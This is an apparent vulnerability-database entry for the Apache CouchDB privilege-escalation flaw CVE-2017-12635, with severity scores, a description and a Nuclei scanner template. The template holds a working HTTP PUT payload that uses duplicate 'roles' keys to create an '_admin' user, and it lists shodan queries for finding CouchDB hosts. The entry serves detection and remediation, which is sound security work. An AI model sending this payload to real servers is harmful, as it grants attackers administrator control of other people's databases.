Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-12635
HistoryFeb 15, 2021 - 1:31 p.m.

Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation

2021-02-1513:31:56
ProjectDiscovery
github.com
26

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.2 High

AI Score

Confidence

High

0.974 High

EPSS

Percentile

99.9%

Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor ‘roles’ used for access control within the database, including the special case ‘_admin’ role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two ‘roles’ keys are available in the JSON, the second one will be used for authorizing the document write, but the first ‘roles’ key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.

id: CVE-2017-12635

info:
  name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation
  author: pikpikcu
  severity: critical
  description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
  impact: |
    Remote attackers can exploit this vulnerability to escalate privileges.
  remediation: |
    Upgrade Apache CouchDB to version 2.1.1 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-12635
    - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
    - https://security.gentoo.org/glsa/201711-16
    - https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html
    - https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbmu03935en_us
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-12635
    cwe-id: CWE-269
    epss-score: 0.97392
    epss-percentile: 0.99913
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2017,cve,couchdb,apache,intrusive

http:
  - raw:
      - |
        PUT /_users/org.couchdb.user:poc HTTP/1.1
        Host:  {{Hostname}}
        Accept: application/json

        {
          "type": "user",
          "name": "poc",
          "roles": ["_admin"],
          "roles": [],
          "password": "123456"
        }

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - application/json
          - "Location:"

      - type: word
        part: body
        words:
          - org.couchdb.user:poc
          - conflict
          - Document update conflict

      - type: status
        status:
          - 201
          - 409
# digest: 4a0a00473045022050e18ef12c950a98aad45bbff1941e8c7a7fd93167d9f197d425495af6cbc0eb022100cd291eceb0c13ca25c672741579c020568759fb0c2fd96e3cb1ea788aa453432:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

8.2 High

AI Score

Confidence

High

0.974 High

EPSS

Percentile

99.9%